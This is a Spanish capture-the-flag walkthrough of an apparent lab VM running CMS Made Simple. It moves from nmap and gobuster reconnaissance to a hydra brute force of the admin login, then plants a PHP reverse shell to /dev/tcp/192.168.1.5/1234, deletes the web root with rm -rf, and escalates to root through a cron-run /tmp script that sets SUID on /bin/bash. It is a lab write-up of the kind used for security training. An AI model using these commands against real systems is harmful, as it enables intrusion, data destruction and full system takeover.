Identificamos la IP:
❯ arp-scan --interface=wlo1 --localnet | grep PCS | awk '{print $1}'
192.168.1.11Enumeramos puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.11
[sudo] contraseña para wh01s17:
Starting Nmap 7.97 ( https://nmap.org ) at 2025-07-29 13:24 -0400
Nmap scan report for 192.168.1.11
Host is up (0.00018s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
6660/tcp open unknown
MAC Address: 08:00:27:FD:11:D2 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.94 seconds❯ nmap -sCV -p 22,80,6660 -oN 02-targeted.txt 192.168.1.11
Starting Nmap 7.97 ( https://nmap.org ) at 2025-07-29 13:25 -0400
Nmap scan report for 192.168.1.11
Host is up (0.00044s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 54:0a:75:c5:26:56:f5:b0:5f:6d:e1:e0:77:15:c7:0d (RSA)
| 256 0b:d7:89:52:2d:13:16:cb:74:96:f5:5f:dd:3e:52:8e (ECDSA)
|_ 256 5a:90:0c:f5:2b:7f:ba:1c:83:02:4d:e7:a2:a2:1d:5b (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-generator: CMS Made Simple - Copyright (C) 2004-2021. All rights reserved.
|_http-title: Home - cool_cms
6660/tcp open unknown
| fingerprint-strings:
| NULL, Socks5:
| MESSAGE FOR WWW-DATA:
| [31m www-data I offer you a dilemma: if you agree to destroy all your stupid work, then you have a reward in my house...
|_ Paul
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port6660-TCP:V=7.97%I=7%D=7/29%Time=68890421%P=x86_64-pc-linux-gnu%r(NU
SF:LL,A5,"\n\n\x20\x20\x20MESSAGE\x20FOR\x20WWW-DATA:\n\n\x20\x1b\[31m\x20
SF:\x20www-data\x20I\x20offer\x20you\x20a\x20dilemma:\x20if\x20you\x20agre
SF:e\x20to\x20destroy\x20all\x20your\x20stupid\x20work,\x20then\x20you\x20
SF:have\x20a\x20reward\x20in\x20my\x20house\.\.\.\n\x20\x20\x20Paul\x20\x1
SF:b\[0m\n")%r(Socks5,A5,"\n\n\x20\x20\x20MESSAGE\x20FOR\x20WWW-DATA:\n\n\
SF:x20\x1b\[31m\x20\x20www-data\x20I\x20offer\x20you\x20a\x20dilemma:\x20i
SF:f\x20you\x20agree\x20to\x20destroy\x20all\x20your\x20stupid\x20work,\x2
SF:0then\x20you\x20have\x20a\x20reward\x20in\x20my\x20house\.\.\.\n\x20\x2
SF:0\x20Paul\x20\x1b\[0m\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.92 secondsVerificamos el puerto 6660:
❯ nc 192.168.1.11 6660
MESSAGE FOR WWW-DATA:
www-data I offer you a dilemma: if you agree to destroy all your stupid work, then you have a reward in my house...
PaulSolo contiene un mensaje al usuario www-data.
Ingresamos al sitio web, y descubrimos que ejecuta CMS Made Simple V 2.2.5.
Enumeramos los directorios:
❯ gobuster dir -u 'http://192.168.1.11' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,sql,xml,zip,sh,db -r
...
/index.php (Status: 200) [Size: 19347]
/modules (Status: 200) [Size: 3381]
/uploads (Status: 200) [Size: 0]
/doc (Status: 200) [Size: 24]
/assets (Status: 200) [Size: 2129]
/admin (Status: 200) [Size: 4479]
/lib (Status: 200) [Size: 24]
/config.php (Status: 200) [Size: 0]
/tmp (Status: 200) [Size: 1131]
...Ingresamos a /admin y nos encontramos con un login.
Hacemos fuerza bruta con hydra:
❯ hydra -l admin -P ~/Documentos/wordlists/rockyou.txt 192.168.1.11 http-post-form "/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:User name or password incorrect" -t 64
...
[80][http-post-form] host: 192.168.1.11 login: admin password: bullshit
...Una vez logueados, nos dirigimos a la sección "Extensions", "User Defined Tags", hacemos click en "Add User Defined Tag" y agregamos un tag malicioso, que contiene una reverse shell:
Name: pwned
code:
<?php
shell_exec("bash -c 'bash -i >& /dev/tcp/192.168.1.5/1234 0>&1'");
?>Corremos netcat en nuestra máquina, ingresamos a nuestro tag y hacemos click en "run":
❯ ncat -nlvp 1234
Ncat: Version 7.97 ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.1.11:47180.
bash: cannot set terminal process group (480): Inappropriate ioctl for device
bash: no job control in this shell
www-data@debian:/var/www/html/admin$Recordamos el mensaje anterior, que nos indicaba que debíamos eliminar nuestro trabajo y encontraríamos una recompensa en el home del usuario paul. Por lo que borramos el contenido de /var/www/html y encontramos la contraseña del usuario paul en su directorio home:
www-data@debian:/var/www$ rm -rf html/*www-data@debian:/home/paul$ cat password.txt
Password is: YouCanBecomePaulNos conectamos por ssh:
❯ ssh paul@192.168.1.11
paul@192.168.1.11\'s password: YouCanBecomePaul
Linux debian 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jul 29 19:44:36 2025 from 192.168.1.5
paul@debian:~$Para movernos al usuario nico, ejecutamos el comando sudo -l:
paul@debian:~$ sudo -l
[sudo] Mot de passe de paul :
Entrées par défaut pour paul sur debian :
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
L\'utilisateur paul peut utiliser les commandes suivantes sur debian :
(nico) /usr/bin/base32Podemos ejecutar el comando base32 como el usuario nico sin contraseña.
Dentro del home de nico, encontramos un archivo llamado .secret.txt, al cuál accedemos mediante base32:
paul@debian:/home/nico$ sudo -u nico base32 /home/nico/.secret.txt | base32 -d | base64 -d
Pw => just_one_more_beerNos logueamos como nico y obtenemos la primera flag:
paul@debian:/home/nico$ su nico
Mot de passe : just_one_more_beer
nico@debian:~$En la raíz, encontramos una carpeta llamada nico, la cual contiene una imagen jpg que transferimos a nuestra máquina para analizarla:
nico@debian:/nico$ ls
homer.jpg
nico@debian:/nico$ python3 -m http.server❯ wget http://192.168.1.11:8000/homer.jpgAnalizamos con stegseek:
❯ stegseek -wl ~/Documentos/wordlists/rockyou.txt homer.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: ""
[i] Original filename: "note.txt".
[i] Extracting to "homer.jpg.out".Encontramos el siguiente mensaje:
❯ cat homer.jpg.out
my /tmp/goodgame file was so good... but I lost itCorremos pspy64 y encontramos una tarea programada:
nico@debian:/tmp$ ./pspy64 | grep goodgame
2025/07/29 20:03:01 CMD: UID=0 PID=15746 | /bin/sh -c /tmp/goodgameVemos que ejecuta el contenido de goodgame, por lo que creamos un archivo malicioso, el cuál, agregue permisos SUID a /bin/bash:
nico@debian:/tmp$ cat goodgame
#!/bin/bash
chmod u+s /bin/bashnico@debian:/tmp$ chmod +x goodgamenico@debian:/tmp$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1168776 avril 18 2019 /bin/bashnico@debian:/tmp$ bash -p
bash-5.0# whoami
rootObtenemos la ultima flag y fin.